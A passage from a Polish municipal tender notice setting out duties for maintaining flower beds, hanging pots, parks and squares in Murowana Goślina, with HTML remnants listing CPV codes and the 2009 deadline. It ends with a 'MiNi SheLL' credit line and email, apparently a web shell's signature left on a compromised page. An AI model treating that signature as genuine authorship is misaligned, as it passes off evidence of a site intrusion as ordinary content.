Lobelia- 170	Aksamitka- 170
Begonia- 170
Petunia- 170

Zmiana nasadzonych kwiatów w momencie przekwitnięcia uprzednio nasadzonego gatunku.
Po dokonaniu nasadzenia każdy kwiat należy podlać wodą w ilości zapewniającej przesiąknięcie bryły korzeniowej,
1.1.5.3.	Pielęgnacji pojemników z kwiatami tj. obcinanie sekatorem przekwitłych kwiatostanów, zbędnych i martwych pędów oraz ręczne wybranie chwastów i śmieci. Częstotliwość prac raz na dobę w okresie od 15 kwietnia do końca października. Wywóz odpadów tego samego dnia po wykonanej pracy.
1.1.5.4.	Likwidacja kwiatów z pojemników polega na usunięciu roślin, przekopaniu ziemi i jej wyrównaniu grabiami. Wybrane odpady należy wywieźć tego samego dnia po wykonanej pracy. Likwidacji kwiatów z pojemników należy dokonać do końca października.
1.1.6.	W zakresie pielęgnacji istniejących rabat:
1.1.6.1.	Pielęgnacja istniejących rabat polega na obcinaniu sekatorem przekwitłych kwiatostanów, zbędnych i martwych pędów oraz ręczne wybranie chwastów i śmieci. Częstotliwość prac 3 razy na tydzień w okresie od 1 maja do końca października. Wywóz odpadów tego samego dnia po wykonanej pracy.
1.1.6.2.	W przypadku kradzieży lub zniszczenia roślin w stopniu uniemożliwiającym dalszą wegetację, należy dokonać nasadzenia uzupełniającego w ilości roślin, które uległy dewastacji bądź kradzieży. 
1.1.7.	Założenia rabaty o powierzchni 300 m2 przy pomniku Powstańców Wielkopolskich: 
1.1.7.1.	Przygotowania rabaty do obsadzenia tj. wybrania chwastów, nawiezienia ziemi granulowanym nawozem mineralnym w ilości 8 kg/100m2, przekopania ziemi, a następnie wyrównanie przez grabienie ziemi. Wywóz odpadów tego samego dnia po wykonanej pracy.
1.1.7.2.	Obsadzenia rabaty kwiatami jednorocznymi (kolor zostanie ustalony z pracownikiem Urzędu): 



I sadzenie	II sadzenie
Bratek - 630
Lobelia- 630	Aksamitka- 630
Begonia- 630
Petunia- 630

Zmiana nasadzonych kwiatów, w momencie przekwitnięcia uprzednio nasadzonego gatunku.
 Po dokonaniu nasadzenia każdy kwiat należy podlać wodą w ilości zapewniającej przesiąknięcie bryły korzeniowej, 
1.1.7.3.	Pielęgnacja rabat polega na obcinaniu sekatorem przekwitłych kwiatostanów, zbędnych i martwych pędów oraz ręczne wybranie chwastów i śmieci. Częstotliwość prac trzy razy na tydzień w okresie od 1 maja do końca października. Wywóz odpadów tego samego dnia po wykonanej pracy.
1.1.7.4.	Likwidacja rabaty polega na usunięciu roślin, przekopaniu ziemi i jej wyrównaniu grabiami. Wybrane odpady należy wywieźć tego samego dnia po wykonanej pracy. Likwidacji rabaty należy dokonać do końca października.
1.1.8.	W zakresie pielęgnacji 150 sztuk wiszących donic na słupach oświetleniowych. 
1.1.8.1.	Przygotowania donic do posadzenia kwiatów tj. spulchnienia ziemi, uzupełnienia braków w wypełnieniu ziemią. 
1.1.8.2.	Nasadzenia roślin tzn. pelargonii bluszczolistnych w ilości 2 sztuk na doniczkę (kolor lub kolory zostaną ustalone z pracownikiem Urzędu).
1.1.8.3.	Po nasadzeniu każdy kwiat należy podlać wodą w ilości zapewniającej przesiąknięcie bryły korzeniowej. 
1.1.8.4.	Zamontowania uchwytów do donic na 10 słupach oświetleniowych (w stylu staromiejskim) na ul. Poznańskiej na odcinku od ul. Wojska Polskiego do Pl. Powstańców Wielkopolskich. Montaż należy wykonać w taki  sposób aby pomiędzy mocowaniem metalowych części a słupem oświetleniowym znajdował się materiał izolacyjny chroniący powierzchnię słupa przed zniszczeniem.
1.1.8.5.	Powieszenia do połowy maja po dwie donice na słupach oświetlenia w pasie drogowym wzdłuż ulic Rogozińskiej (od ul. Polnej do Pl. Powstańców), Poznańskiej (od Placu Powstańców do ul. Mściszewskiej), Długiej, Gen. T. Kutrzeby, Rondzie na skrzyżowaniu ul. Poznańskiej, Długiej i Śliwkowej oraz na placu Powstańców Wielkopolskich. Od dnia powieszenia doniczek, przez okres dwóch tygodni codziennie, z wyjątkiem dni deszczowych, należy podlewać rośliny w ilości zapewniającej przesiąknięcie bryły korzeniowej. 
1.1.8.6.	Po 14 dniach od dnia powieszenia doniczek, należy nawieźć ziemię nawozem płynnym, przeznaczonym do pelargonii. Nawóz należy stosować wg wskazówek i w ilości podanej przez producenta. Częstotliwość nawożenia raz trzy tygodnie aż do czasu zdjęcia doniczek.
1.1.8.7.	Likwidacja doniczek polega na zdjęciu ich ze słupów oświetlenia, usunięciu martwych kwiatów, łodyg i liści i przechowania całego zestawu do przyszłego roku. Zdjęcia doniczek należy dokonać do końca października.
1.1.9.	Podlewanie kwiatów na rabatach i w kwietnikach polega na pobraniu wody do beczkowozu, przejazd do miejsca podlewania i za pomocą węża      ogrodowego wprowadzenia wody do ziemi. Podlewanie należy prowadzić w taki sposób by nie nastąpiło uszkodzenie rośliny, a woda najkrótszą drogą dotarła do bryły korzeniowej. 
1.1.10.	Określa się częstotliwość podlewania roślin w pojemnikach z kwiatami i berberysami: 5 razy w tygodniu w ilości 1 litra wody na jedną roślinę; rabat: 5 razy w tygodniu w ilości 1 litra wody na jedną roślinę; kwiatów wiszących w pojemnikach (pelargonii): 5 razy w tygodniu w ilości 1 litra na jedną roślinę. Podlewanie należy wykonywać w okresie bezopadowym trwającym dłużej niż 5 dni. Podlewanie należy prowadzić w okresie od 10 maja do końca października.
1.1.11.	Koszty związane z poborem wody do podlewania roślin ponosi Wykonawca.
1.1.12.	Zamawiający nie zapewnia dostępu do wody. Wodę można pobrać z ujęcia wody na Placu Powstańców Wielkopolskich w Murowanej Goślinie - firma Aquanet S.A. Podpisanie umowy na pobór wody z zarządcą ujęcia oraz płatności tytułu kkorzystania z ujęcia  leżą po stronie Wykonawcy.
1.1.13.	Wymaga się od Wykonawcy Zadania 2 w okresie trwania umowy, corocznego ustawienia choinki (świerk pospolity) na Placu Powstańców Wielkopolskich o wysokości ok. 12 metrów. Termin ustawienia choinki  5 grudnia; termin usunięcia choinki do końca stycznia.
1.1.14.	Wymaga się od Wykonawcy Zadania 2 konserwacji ławek zamontowanych w Parku Miejskim (8 sztuk) oraz na Placu Powstańców Wielkopolskich (19 sztuk). Konserwacja polega na: wymianie uszkodzonych drewnianych elementów tj. usunięciu złamanego siedziska lub oparcia, założenia elementu o tych samych wymiarach oraz jego dwukrotnego pomalowania farbą olejną. Pozostałe niezniszczone elementy należy oczyścić szczotką drucianą i raz pomalować farbą olejną. Prace należy wykonać do końca kwietnia.
1.1.15.	Wymaga się od Wykonawcy Zadania 2 bieżącego utrzymania czystości              i porządku terenu Parku Miejskiego przy ul. Poznańskiej w tym także placu zabaw. Polegać to ma na zamiataniu chodników raz na 7 dni, codziennego przeglądu czystości i porządku w ww. miejscach tj. opróżniania 10 koszy na śmieci, wyzbierania śmieci leżących na trawniku i chodniku. Raz w miesiącu należy oczyścić chodniki i krawężniki z darni, piasku i ziemi. Zebrane odpady należy wywieźć tego samego dnia po zakończeniu sprzątania.
1.1.16.	Wymaga się od Wykonawcy Zadania 2 utrzymania czystości i porządku na terenie Placu Powstańców Wielkopolskich tj. zamiataniu chodników raz na 7 dni, codziennego przeglądu czystości i porządku w w. miejscach tj. opróżnienia 13 koszy na śmieci, wyzbierania śmieci leżących na trawie                 i chodniku. Raz w miesiącu należy oczyścić chodniki i krawężniki z darni, piasku i ziemi. Dodatkowo należy utrzymać krzewy rosnące wzdłuż zachodniej pierzei w stylu ogrodu francuskiego. Zebrane odpady należy wywieźć tego samego dnia po zakończeniu sprzątania.
1.1.17.	Wymaga się od Wykonawcy Zadania 2 zimowego utrzymania ciągów pieszych zlokalizowanych w Parku Miejskim tj. podczas opadów śniegu należy między 5:00 a 6:30 i między 15:00 a 16:30 usunąć śnieg poprzez zgarnięcie go na trawnik. Następnie ciągi piesze należy posypać piaskiem. W przypadku gołoledzi ciągi piesze należy posypać piaskiem,
1.1.18.	 Wymaga się od Wykonawcy Zadania 2 zimowego utrzymania ciągów pieszych zlokalizowanych na Placu Powstańców Wielkopolskich tj. podczas opadów śniegu należy między 6:30 a 8:00 i między 16:30 a 18:00 usunąć śnieg poprzez zgarnięcie go na trawnik. Następnie ciągi piesze należy posypać piaskiem. W przypadku gołoledzi ciągi piesze należy posypać piaskiem,
1.1.19.	Wymaga się od Wykonawcy zadania 2 uporządkowania terenu wokół pomnika Powstańców Wielkopolskich na dwie godziny przed uroczystościami obchodzonymi w dniu: 3 maja, 8 maja, 1 września, 17 września oraz 11 listopada i 27 grudnia. Pielęgnacja ma polegać na  skoszeniu trawy, zgrabieniu skoszonej trawy i liści, wyzbierania śmieci, oczyszczenia chodników z piasku i ziemi, pielęgnacji rabat. Zebrane odpady należy niezwłocznie wywieźć po zakończeniu prac. W przypadku zalegania śniegu należy go usunąć z chodnika przed pomnikiem i z samego pomnika. Chodnik należy posypać piaskiem. Powierzchnia do odśnieżenia ok. 350 m2. 
1.1.20.	Wymaga się do Wykonawcy Zadania 2 na dzień przed imprezami gminnymi i uroczystościami takimi jak: Jarmark Świętego Jakuba, Bike Marathon, Mistrzostwa Polski Weteranów w Półmaratonie i Boże Ciało, Święto Niepodległości, Święto Narodowe 3 maja uprzątnięcia Placu Powstańców Wielkopolskich tj. wykoszenia i zgrabienia trawy, zgrabienia liści, pielęgnacji rabat, wyzbierania śmieci oraz oczyszczenia chodników z piasku i ziemi. Zebrane odpady należy niezwłocznie wywieźć po zakończeniu prac,
1.1.21.	Wymaga się do Wykonawcy Zadania 2 pielęgnacji i podlewania skrzynek z roślinami zimozielonymi o powierzchni 3 m2 przy budynku Urzędu  tj. podlania roślin raz na 5 dni w ilości 5 litrów wody na jedną roślinę. Podlewanie należy wykonywać w okresie bezopadowym trwającym dłużej niż 5 dni. Podlewanie należy prowadzić w okresie od 1 maja do końca października, 
1.1.22.	Wymaga się od Wykonawcy Zadania 2 utrzymywania czystości na terenach określonych w Załączniku 2. Z trawników, krzewów, rabat, pojemników z kwiatami jednorocznymi do godziny 8:00 każdego dnia należy wyzbierać odpady (papierki, filie, butelki szklane, plastikowe etc.). Odpady należy zebrać do worków foliowych i niezwłocznie przewieźć na składowisko odpadów komunalnych w Białęgach. Utrzymywanie czystości należy prowadzić przez 6 dni w tygodniu, od poniedziałku do soboty,
1.1.23.	Transport wszelkich odpadów należy prowadzić w sposób nie powodujący zanieczyszczenia tras. W przypadku zanieczyszczenia trasy, odpady należy natychmiast zebrać. 
1.1.24.	W momencie powstania kompostowni na terenie gminy, odpady powstałe podczas pielęgnacji, należało będzie przekazywać na kompostownię.
Zamawiający zastrzega sobie prawo do zmiany miejsca wykonywania usługi, poprzez zamianę lub dodanie nowych powierzchni na terenie Miasta i Gminy Murowana Goślina objętych pracami pielęgnacyjnymi. Zmiany lokalizacji nie mogą spowodować przekroczenia łącznych powierzchni terenów zielonych oraz ilości drzew lub roślin jednorocznych określonych w niniejszym opisie przedmiotu zamówienia..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.34.00.00-5, 77.31.30.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com